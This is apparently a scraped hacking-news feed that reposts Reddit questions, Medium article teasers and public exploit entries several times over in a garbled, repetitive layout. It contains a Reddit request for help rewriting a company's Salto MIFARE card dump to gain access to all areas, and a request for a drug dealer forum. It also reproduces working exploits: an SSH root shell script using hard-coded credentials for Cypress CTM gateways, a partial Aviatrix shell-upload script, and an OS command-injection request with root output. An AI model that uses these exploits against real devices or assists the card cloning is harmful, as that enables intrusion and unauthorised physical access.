hacking: security in practice
salto codes
ive managed to find the keys that our company uses to store the salto data on the mifare clasic cards just wonderin if anyone could help me with what it means and how i could change it to get acess all areas?
code start:
+Sector: 0
C4EB408AE5880400C852002000000020
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 1
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 2
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 3
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 4
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 5
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 6
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 7
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 8
D106F78D0D57C1C98B327D4F37D0E370
A96E31C7CE4A276DA2D9E567912715A5
73CA0A3DD7F027710000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 9
00000000000000000000000000000000
0000FF7F1FA22D599682C28589932202
D53DD22050079123CADF07D925C2AA79
6A1987C40A21F78F005A7F33625BC129
+Sector: 10
8B852B249F1E680365D0C53B76F0C5F6
3F400000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 11
86A8B2858E217848EB9AB64586674861
F880B85733D60423B46C83CCE21683B0
B0EFE99313D7B634D0C8A1E0B27B1C65
6A1987C40A21F78F005A7F33625BC129
+Sector: 12
A52A1618EFFFECC5723F7DAE4EAB6866
09424D80AD093D733EB8C911B8C84BD5
0A0227767D53AEA2E282D104CEA33318
6A1987C40A21F78F005A7F33625BC129
+Sector: 13
B45FA3737248CD485E4690079D27CF68
C9354E48728A75763690A6E1C205E05F
4181E9D5ADFDD79521AF80F2308D56B8
6A1987C40A21F78F005A7F33625BC129
+Sector: 14
322400E60000001A00000000FC000000
00BD42F779CE87DE4693078A673D1BB0
5958057BCCFBA333B44E8A8435D754EA
6A1987C40A21F78F005A7F33625BC129
+Sector: 15
E0FF00000048EF481F00FFFFFFB710B7
FF813800100200BA0000000000000000
FFFF0EF101A1EBED92C688EF61DBF234
6A1987C40A21F78F005A7F33625BC129
submitted by /u/samwisedrn
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
salto codes
ive managed to find the keys that our company uses to store the salto data on the mifare clasic cards just wonderin if anyone could help me with what it means and how i could change it to get acess all areas?
code start:
+Sector: 0
C4EB408AE5880400C852002000000020
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 1
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 2
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 3
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 4
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
FFFFFFFFFFFFFF078069FFFFFFFFFFFF
+Sector: 5
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 6
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 7
00000000000000000000000000000000
00000000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 8
D106F78D0D57C1C98B327D4F37D0E370
A96E31C7CE4A276DA2D9E567912715A5
73CA0A3DD7F027710000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 9
00000000000000000000000000000000
0000FF7F1FA22D599682C28589932202
D53DD22050079123CADF07D925C2AA79
6A1987C40A21F78F005A7F33625BC129
+Sector: 10
8B852B249F1E680365D0C53B76F0C5F6
3F400000000000000000000000000000
00000000000000000000000000000000
6A1987C40A21F78F005A7F33625BC129
+Sector: 11
86A8B2858E217848EB9AB64586674861
F880B85733D60423B46C83CCE21683B0
B0EFE99313D7B634D0C8A1E0B27B1C65
6A1987C40A21F78F005A7F33625BC129
+Sector: 12
A52A1618EFFFECC5723F7DAE4EAB6866
09424D80AD093D733EB8C911B8C84BD5
0A0227767D53AEA2E282D104CEA33318
6A1987C40A21F78F005A7F33625BC129
+Sector: 13
B45FA3737248CD485E4690079D27CF68
C9354E48728A75763690A6E1C205E05F
4181E9D5ADFDD79521AF80F2308D56B8
6A1987C40A21F78F005A7F33625BC129
+Sector: 14
322400E60000001A00000000FC000000
00BD42F779CE87DE4693078A673D1BB0
5958057BCCFBA333B44E8A8435D754EA
6A1987C40A21F78F005A7F33625BC129
+Sector: 15
E0FF00000048EF481F00FFFFFFB710B7
FF813800100200BA0000000000000000
FFFF0EF101A1EBED92C688EF61DBF234
6A1987C40A21F78F005A7F33625BC129
submitted by /u/samwisedrn
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
salto codes
ive managed to find the keys that our company uses to store the salto data on the mifare clasic cards just wonderin if anyone could help me with...
hacking: security in practice
just started learning with try hack me!
Its only the basics but it's pretty fun! :)
submitted by /u/SoulBoiii
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
just started learning with try hack me!
Its only the basics but it's pretty fun! :)
submitted by /u/SoulBoiii
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
just started learning with try hack me!
Its only the basics but it's pretty fun! :)
hacking: security in practice
Just found out lost Wordpress website (hacked). What can I do better next time?
I really believe this is a product from switching hosting providers, last month was using A2hosting for 67 $ usd a month VPS for 2 years, switched over to a single Wordpress hosting plan on Interserver for 8 Dollars. Took no backup of website, site took years to curate categories and minimum 400 word Descriptions for each one, ontop of content. Essentially my fault for not taking a backup. My Cpanel is still showing last login from a German VPN.
Aside from not using current host, what plugins would you suggest I use ? If you're going to run a WordPress site at all, what's your prefered environment or OS? I went through breakthroughs in past 12 months with personal problems that prevented me from learning what to do on the server-side of a website. Not going to depend on Fiverr anymore. Any advice is highly appreciated!
submitted by /u/ToneOnTheTrack
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Just found out lost Wordpress website (hacked). What can I do better next time?
I really believe this is a product from switching hosting providers, last month was using A2hosting for 67 $ usd a month VPS for 2 years, switched over to a single Wordpress hosting plan on Interserver for 8 Dollars. Took no backup of website, site took years to curate categories and minimum 400 word Descriptions for each one, ontop of content. Essentially my fault for not taking a backup. My Cpanel is still showing last login from a German VPN.
Aside from not using current host, what plugins would you suggest I use ? If you're going to run a WordPress site at all, what's your prefered environment or OS? I went through breakthroughs in past 12 months with personal problems that prevented me from learning what to do on the server-side of a website. Not going to depend on Fiverr anymore. Any advice is highly appreciated!
submitted by /u/ToneOnTheTrack
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Just found out lost Wordpress website (hacked). What can I do...
I really believe this is a product from switching hosting providers, last month was using A2hosting for 67 $ usd a month VPS for 2 years, switched...
Deep Web
Is there a Reddit of the deep web?
is there something on the deep web like Reddit? or more specifically a drug dealer form?
submitted by /u/Temptation808
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is there a Reddit of the deep web?
is there something on the deep web like Reddit? or more specifically a drug dealer form?
submitted by /u/Temptation808
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is there a Reddit of the deep web?
is there something on the deep web like Reddit? or more specifically a drug dealer form?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Projects of our Hackday 2021
https://cdn-images-1.medium.com/max/2600/1*Wwd56zrWbUdQnmx855XNng.jpeg
Same as last year, I organized an Hackday at my current company. Luckily, we could spend this year together in the office, and not…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Projects of our Hackday 2021
https://cdn-images-1.medium.com/max/2600/1*Wwd56zrWbUdQnmx855XNng.jpeg
Same as last year, I organized an Hackday at my current company. Luckily, we could spend this year together in the office, and not…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Projects of our Hackday 2021
Same as last year, I organized an Hackday at my current company. Luckily, we could spend this year together in the office, and not…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
My journey so far and how I got into hacking
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
My journey so far and how I got into hacking
Introduction
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
My journey so far and how I got into hacking
Introduction
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hackers’ use of Swift network means banks worldwide need deeper layers of security defense
A NUMBER OF HIGH-PROFILE — AND HIGH COST — CYBER HEISTS THAT LEVERAGED THE INTERNATIONAL SWIFT NETWORK TO EXECUTE LARGE-SCALE FRAUDULENT…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hackers’ use of Swift network means banks worldwide need deeper layers of security defense
A NUMBER OF HIGH-PROFILE — AND HIGH COST — CYBER HEISTS THAT LEVERAGED THE INTERNATIONAL SWIFT NETWORK TO EXECUTE LARGE-SCALE FRAUDULENT…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hackers’ use of Swift network means banks worldwide need deeper layers of security defense
A NUMBER OF HIGH-PROFILE — AND HIGH COST — CYBER HEISTS THAT LEVERAGED THE INTERNATIONAL SWIFT NETWORK TO EXECUTE LARGE-SCALE FRAUDULENT…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Crean un algoritmo “consciente de sí mismo” para protegerse de ciberataques
https://cdn-images-1.medium.com/max/1571/0*PADBcxkVEXD-a8Ow
PUBLICADO EN 11 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Crean un algoritmo “consciente de sí mismo” para protegerse de ciberataques
https://cdn-images-1.medium.com/max/1571/0*PADBcxkVEXD-a8Ow
PUBLICADO EN 11 OCTUBRE, 2021POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Crean un algoritmo “consciente de sí mismo” para protegerse de ciberataques
PUBLICADO EN 11 OCTUBRE, 2021POR EHACKING
A Tale of Weird XSS into $100
Hey Guys , How are you all ? . I hope so your doing good and healthy . So, Lets get started . So , I started searching for bugbounty…Continue reading on Medium »
Read more...
Hey Guys , How are you all ? . I hope so your doing good and healthy . So, Lets get started . So , I started searching for bugbounty…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png Cypress Solutions CTM-200/CTM-ONE suffers from a hard-coded credential remote root vulnerability via telnet and ssh.
MD5 |
___________________________
@hacking_Attack
@Hacking_Video
Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root
https://2.bp.blogspot.com/-KCLJyqafybo/WWlvfwHA-LI/AAAAAAAAIQI/MCuUzFpEyfsyWr-64Egm7HXW4FQP4atdgCLcBGAs/s1600/h88.png Cypress Solutions CTM-200/CTM-ONE suffers from a hard-coded credential remote root vulnerability via telnet and ssh.
MD5 |
4dc0da6ff777de3e071d0c7c9de1dabaDownload #!/usr/bin/env python3
#
#
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)
#
#
# Vendor: Cypress Solutions Inc.
# Product web page: https://www.cypress.bc.ca
# Affected version: CTM-ONE (1.3.6-latest)
# CTM-ONE (1.3.1)
# CTM-ONE (1.1.9)
# CTM200 (2.7.1.5659-latest)
# CTM200 (2.0.5.3356-184)
#
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed
# and mobile applications. The CTM-200 is a Linux based platform powered
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
# features make the CTM-200 ideal for mobile fleet applications or fixed
# site office and SCADA communications.
#
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and
# fixed applications. CTM-ONE is your next generation of gateway for fleet
# tracking and fixed sites.
#
# ======================================================================
# CTM-200
# /var/config/passwd:
# -------------------
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash
# nobody:*:65534:65534:nobody:/var:/bin/false
# daemon:*:65534:65534:daemon:/var:/bin/false
#
# /var/config/advanced.ini:
# -------------------------
# 0
# 0
# Chameleon
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
# 0,0,0,0,0,255
#
#
# CTM-ONE
# /etc/shadow:
# ------------
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::
# daemon:*:16009:0:99999:7:::
# bin:*:16009:0:99999:7:::
# sys:*:16009:0:99999:7:::
# ftp:*:16009:0:99999:7:::
# nobody:*:16009:0:99999:7:::
# messagebus:!:16009:0:99999:7:::
# ======================================================================
#
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials
# within their Linux distribution image. This weakness can lead to the
# exposure of resources or functionality to unintended actors, providing
# attackers with sensitive information including executing arbitrary code.
#
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)
# GNU/Linux 2.6.32.25 (arm4tl)
# lighttpd/1.4.39
# BusyBox v1.24.1
# BusyBox v1.15.3
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5686
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php
#
#
# 21.09.2021
#
import sys
import paramiko
bnr='''
o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o
│ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │
o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o
'''
print(bnr)
if len(sys.argv)
print('Put an IP.')
sys.exit()
adrs=sys.argv[1]##
unme='root'#admin#
pwrd='Chameleon'##
rsh=paramiko.SSHClient()
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
rsh.connect(adrs,username=unme,password=pwrd)
while 1:
cmnd=input('# ')
if cmnd=='exit':
break
stdin,stdout,stderr=rsh.exec_command(cmnd)
stdin.close()
print(str(stdout.read().decode()))
rsh.close() Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Aviatrix Controller 6.x Path Traversal / Code Execution
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Aviatrix Controller versions 6.x prior to 6.5-1804.1922 shell upload exploit that leverages a directory traversal vulnerability.
MD5 |
Download
#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""
░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ▄█─ ── ─█▀█─ █▀▀█ ▄▀▀▄ ▄▀▀▄ █▀▀█
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─█─ ▀▀ █▄▄█▄ █▄▀█ ▄▀▀▄ █▄▄─ █▄▀█
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ▄█▄ ── ───█─ █▄▄█ ▀▄▄▀ ▀▄▄▀ █▄▄█
Author : 0xJoyGhosh
Org : System00 Security
Twitter: @0xjoyghosh
""")
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Aviatrix Controller 6.x Path Traversal / Code Execution
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Aviatrix Controller versions 6.x prior to 6.5-1804.1922 shell upload exploit that leverages a directory traversal vulnerability.
MD5 |
c9d98e50193dc69bebb982a539da15c7Download
#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""
░█▀▀█ ░█──░█ ░█▀▀▀ ── █▀█ █▀▀█ █▀█ ▄█─ ── ─█▀█─ █▀▀█ ▄▀▀▄ ▄▀▀▄ █▀▀█
░█─── ─░█░█─ ░█▀▀▀ ▀▀ ─▄▀ █▄▀█ ─▄▀ ─█─ ▀▀ █▄▄█▄ █▄▀█ ▄▀▀▄ █▄▄─ █▄▀█
░█▄▄█ ──▀▄▀─ ░█▄▄▄ ── █▄▄ █▄▄█ █▄▄ ▄█▄ ── ───█─ █▄▄█ ▀▄▄▀ ▀▄▄▀ █▄▄█
Author : 0xJoyGhosh
Org : System00 Security
Twitter: @0xjoyghosh
""")
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Aviatrix Controller 6.x Path Traversal / Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png Cypress Solutions CTM-200 wireless gateway version 2.7.1 suffers from an authenticated semi-blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to the wget command in /usr/bin/cmdmain ELF binary.
MD5 |
138: echo "
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
"
139: cmd upgradefw "$FORM_fw_url"
140: unset FORM_install_fw_url FORM_submit
141: echo "
Done."
142: fi
==================================================================
cmdmain (ELF):
memset(&DAT_0003bd1c,0,0x80);
make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
iVar3 = ctm_fopen(local_184,"r");
if (iVar3 == 0) {
uVar5 = *(undefined4 *)(iParm2 + 8);
__s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
goto LAB_0001f4a8;
}
ctm_fclose();
memset(local_184,0,0x100);
sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
=================================================================
cmd (ELF):
while (sVar1 = strlen(__s2), uVar7 < sVar1) {
__s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
__s2 = *ppcVar8;
uVar7 = uVar7 + 1;
}
uStack180 = 0x7273752f;
uStack176 = 0x6e69622f;
uStack172 = 0x646d632f;
uStack168 = 0x6d632f73;
uStack164 = 0x69616d64;
uStack160 = 0x6e;
uStack159 = 0;
iVar2 = execv((char *)&uStack180,ppcParm2);
================================================================================================
Tested on: GNU/Linux 2.6.32.25 (arm4tl)
BusyBox v1.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php
21.09.2021
--
PoC POST request:
-----------------
POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
[...]
___________________________
@hacking_Attack
@Hacking_Video
Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png Cypress Solutions CTM-200 wireless gateway version 2.7.1 suffers from an authenticated semi-blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to the wget command in /usr/bin/cmdmain ELF binary.
MD5 |
5443c1ca578d802c9f7cf55428781490Download Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
Vendor: Cypress Solutions Inc.
Product web page: https://www.cypress.bc.ca
Affected version: 2.7.1.5659
2.0.5.3356-184
Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.
The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.
Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site
office and SCADA communications.
Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection
vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user
through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd
upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to
the wget command in /usr/bin/cmdmain ELF binary.
================================================================================================
/www/cgi-bin/webif/ctm-config-upgrade.sh:
-----------------------------------------
136: if ! empty "$FORM_install_fw_url"; then
137: echo ""138: echo "
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
"
139: cmd upgradefw "$FORM_fw_url"
140: unset FORM_install_fw_url FORM_submit
141: echo "
Done."
142: fi
==================================================================
cmdmain (ELF):
memset(&DAT_0003bd1c,0,0x80);
make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
iVar3 = ctm_fopen(local_184,"r");
if (iVar3 == 0) {
uVar5 = *(undefined4 *)(iParm2 + 8);
__s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
goto LAB_0001f4a8;
}
ctm_fclose();
memset(local_184,0,0x100);
sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
*(undefined4 *)(iParm2 + 8));
ctmsys(local_184);
=================================================================
cmd (ELF):
while (sVar1 = strlen(__s2), uVar7 < sVar1) {
__s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
__s2 = *ppcVar8;
uVar7 = uVar7 + 1;
}
uStack180 = 0x7273752f;
uStack176 = 0x6e69622f;
uStack172 = 0x646d632f;
uStack168 = 0x6d632f73;
uStack164 = 0x69616d64;
uStack160 = 0x6e;
uStack159 = 0;
iVar2 = execv((char *)&uStack180,ppcParm2);
================================================================================================
Tested on: GNU/Linux 2.6.32.25 (arm4tl)
BusyBox v1.15.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php
21.09.2021
--
PoC POST request:
-----------------
POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
[...]
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Exploit Collector Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png Cypress Solutions CTM-200 wireless gateway version 2.7.1…
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"
1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"
`id`
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"
Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"
------WebKitFormBoundaryZlABvwQnpLtpe9mM--
Response:
---------
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
...
...
Firmware Management
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image:
extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK
Done.
...
...
Proceed Changes
* » Save Configuration « X-WrtEnd user extensions for OpenWrt Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"
1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"
`id`
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"
Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"
------WebKitFormBoundaryZlABvwQnpLtpe9mM--
Response:
---------
HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
